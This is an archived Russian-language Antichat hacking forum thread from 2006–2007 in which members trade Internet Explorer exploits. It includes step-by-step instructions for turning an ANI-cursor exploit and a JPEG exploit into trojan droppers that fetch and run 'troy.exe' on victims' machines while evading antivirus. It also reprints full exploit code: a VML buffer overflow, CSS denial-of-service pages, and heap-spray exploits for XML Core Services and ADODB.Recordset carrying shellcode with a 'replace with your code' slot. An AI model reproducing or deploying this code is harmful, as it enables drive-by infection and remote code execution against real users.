Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.10.2006, 00:44
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005
Репутация:
131
|
|
Сообщение от Dr.Check
_http://www.security.nnov.ru/files/mssmb_poc.c - сплойт
_http://www.lan.krasu.ru/struct/net/security/index.asp?part=3 заплатки всякие
я не уточнил , я думал есть готовый де то , сам не умею компилить (
|
|
|
15.10.2006, 01:17
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
KPOT_f!nd
Если ты уж пишешь, то будь добр выкладывать источники
http://www.xakep.ru/magazine/xa/085/077/1.asp
Сообщение от Elekt
ммм... понимаешь, KPOT_f!nd, эксплойты под IE (тем более рабочие) - весчь приватная.
Ну тут я не соглашусь  . Приватные эксплоиты считаються 0day сплоиты, и те регулярно выкладываються на багтраках значительно раньше, нежели выходит обновение. . Во вторник обновление, в среду мы видим очередной рабочий код 0day сплоита для ослика .
Последний хитовый с пробивом SP2 на моей памяти был VML сплоит, четыре версии которого можно найти на milw0rm.com.
Сообщение от Elekt
Усли кого интересуют доступные эксплойты, советую скачать метасплойт и изучить
Вот тут полностью согласен . На рынке существуют сейчас куча "приватных" связок, и прочих вещей, которые продаються за $ с несколькими нулями ., и одновременно в сети есть доступный всем проект метасплоита, где регулярно выкладываються самые последние разработки.
ИМХО, начинать знакомство нужно именно с него. Больше вообще ничего не надо, пока проект жив.
|
|
|
|
24.10.2006, 15:11
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Я так понял под "приватностью" Elekt имел ввиду то что они чьи-то, т. е там уже все параметры заложены. Вот взять бы ie_xp_metafile.pm - эксплоит-то сам давно в баблике, а отдать готовый никому нельзя (всё равно будет на тебя работать). Т. е. надо его пересобирать конкретно под свои нужды (сплоит+начинка+их параметры). Ну а так вообщё-то прав SladerNon, 0day сплоиты, пока они не выложены на багтракх, а продаются за несколько K$ - они и есть приватные. (то есть не публичные). Поэтому сплоит, работающий тока на тебя (уже заряженный начинкой с параметрами), язык как-то не поворачивается назвать публичным. Вот пакет Метасплоит публичный, исходники сплоитов тоже, а на выходе получаем совсем личные сплоиты! (читай приватные) ГЫ!. Тут висят мои, ну и какие они? личные, публичные или приватные? Х .е. З. вообщем.
Последний раз редактировалось -=lebed=-; 24.10.2006 в 15:20..
|
|
|
|
"Для закачки и запуска удалённого файла" |
26.10.2006, 02:53
|
|
Banned
Регистрация: 25.10.2006
Сообщений: 8
Провел на форуме:
74917
Репутация:
-8
|
|
"Для закачки и запуска удалённого файла"
"Ani exploit" 
Собирается он так: скачиваем ani-spl.exe запускаем с параметрами (ani-spl.exe name http:\\somesite\troy.exe) в результате получаем два файла - name.html и name.ani - код из name.html вставляем в любую страничку..
Необходимо чтобы с name.html в одной папке был и name.ani- он и скачает на комп жертвы troy.exe
* недостатки: работает только с IE +
* не работает в SP2
+ абсолютно незаметен при запуске
+ можно вставить его в сайт с нормальным содержанием.
AVP базы до 02.2005 не палит его
По-моему (имхо) лучший сплоит для IE на сегодняшний день.
Качаем нах...
Последний раз редактировалось stap; 26.10.2006 в 03:05..
|
|
|
|
"Есть баг позволяющий запустить (*.exe) встроенный в картинку" |
26.10.2006, 03:07
|
|
Banned
Регистрация: 25.10.2006
Сообщений: 8
Провел на форуме:
74917
Репутация:
-8
|
|
"Есть баг позволяющий запустить (*.exe) встроенный в картинку"
(платформа- Windows Explorer)
И так скачиваем ms04exp.zip
1. подменяем hеllo.exe своим трояном.
2. Запускаем jpg_gen.bat.
3. компилируем проект(CTRL+F9), должен появится файл jpg_gen.bin
4. переименовываем в jpg_gen.jpg
При его запуске сначала наблюдается зависание. ПРИЧЕМ не надо открывать картинку достадочно лишь навести курсор ... и Троян сделает свое черное дело.
*недостатки: не работает в SP 2
+ легко выдать за свою фотку
+ появилось в базах AVP в 02.2005 т.е.
Необновленный каспер не спасёт.
Последний раз редактировалось stap; 26.10.2006 в 03:17..
|
|
|
|
28.10.2006, 04:04
|
|
Новичок
Регистрация: 14.10.2006
Сообщений: 27
Провел на форуме:
34342
Репутация:
0
|
|
А есть сплоиты для запуска pop-up или pop-exit окон, чтобы в SP2 не блокировались?
Был бы очень признателен. Если у кого есть приватный, то мог бы купить по сходной цене.
ICQ 402136
|
|
|
|
13.11.2006, 13:17
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки проверки границ данных в Microsoft Vector Graphics Rendering (VML) библиотеке (vgx.dll) при обработке определенных VML документов. Удаленный пользователь может с помощью специально сформированного VML документа, содержащего слишком длинный метод fill внутри тега rect, вызвать переполнение стека и выполнить произвольный код на целевой системе.
Примечание: уязвимость активно эксплуатируется в настоящее время.
воздействие: отказ в обслуживании
20 сентября, 2006
<!--
Currently just a DoS
EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX
Shirkdog
-->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>
</body>
</html>
# milw0rm.com [2006-09-19]
источник инф: http://www.securitylab.ru/poc/274149.php
А тут ie_vml_rectfill.pm - вполне рабочий сплоит от Metasploit Framework - проверял на SP2+IE6 (без патчей) |
|
|
|
07.12.2006, 12:29
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Свежие баги в IE..
Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Автор: José Carlos Nieto Jarquín
Дата: Ср. 6 Дек. 2006 11:01
Tested under Windows XP SP2, MSIE 6.0.2900.2180
Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWi dth+'px');">
<tr><td></td></tr>
</table>
</div>
Exploit 2
<div style="width: expression(window.open(self.location));">
</div>
Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+do cument.getElementById('foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder  . It sucks, don't use it .
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html> |
|
|
|
11.12.2006, 12:27
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
Author: n/a
Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239
Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)
Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.
/str0ke
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090 %u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C% u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107% u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01% u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70% u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B% uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;
obj.open(new Object(),new Object(),new Object(),new Object(), new Object());
obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>
</body></html>
Зашит на шеллкод - запуск калькулятора.
P.S. Вставленные пробелы в длинных строках убрать естестевнно...
|
|
|
|
28.03.2007, 10:54
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009)
Это код эксплуатирует "ошибка двойного освобождения" в msado15.dll, в NextRecordset () функции.
В результате двойного освобождения некоторой строки, возможна перезапись Управляющего блока Динамической памяти злонамеренным кодом.
Методика эксплуатации основана на "Переотображении хранения".
Выполняет calc.exe если успех.
P.S. У меня просто свалил браузер IE.
Код:
<HTML>
<!--
**********************************************************************************
Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
**********************************************************************************
Review:
This code exploit "double free error" in msado15.dll NextRecordset() function.
As a result of double freeing of same string, rewriting of Heap Control Block
by malicious data is occuring.
Technique of exploitation is based on "Lookaside remapping".
Runs calc.exe if success.
-->
<HEAD>
<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
</HEAD>
<BODY onLoad='Go()'>
<script language=javascript>
//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
//------------------Replace with your code-----------------------//
//-------------Heap Repair Code. Do not Replace------------------//
var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05%u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u8303%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E%u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u6642%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
//-------------Heap Repair Code. Do not Replace------------------//
var part1 = '';
var part2 = '';
var partLen = 127;
function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x05050505;
var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
function PrepJmpcode(sp)
{
switch(sp){
case "preSP2":
var egg="";
egg+=unescape("%u0608%u0014");
egg+=unescape("%u0000%u0000");
egg+=unescape("%uF708%u0013");
egg+=unescape("%u0000%u0101");
egg+=unescape("%uFFFF%uFFFF");
egg+=unescape("%uFFFF%uFFFF");
part1+=unescape("%u0400%u0014");
part1+=unescape("%u320C%u77FC");
while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode
while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
part2+=egg;
break;
case "SP2":
var egg="";
egg+=unescape("%u0608%u0014");
egg+=unescape("%u0000%u0000");
egg+=unescape("%uF708%u0013");
egg+=unescape("%u0000%u0101");
egg+=unescape("%uFFFF%uFFFF");
egg+=unescape("%uFFFF%uFFFF");
part1+=unescape("%u0505%u0505");
part1+=unescape("%ue128%u75c7");
while (part1.length<partLen) {part1+=unescape("%uFFFF");}
while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
part2+=egg;
break;
}
}
function Exploit()
{
var arr=new Array();
var i=1;
while(i<500){
try{
k=1;
while(k<500){ arr[k]=part1+part2; k++; }
obj.NextRecordset( part1+part2 );
}catch(e){}
i++;
}
}
function Go(){
PrepMem();
PrepJmpcode( GetSystemVersion() );
Exploit();
}
</script>
</body>
</html>
# milw0rm.com [2007-03-26]
источник: http://milw0rm.com/exploits/3577 (берите на тестирование - тут без пробелов) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для inferno[DGT]](/avatars/avatar28247.gif){kind=avatar}
Похожие темы
Линейный вид
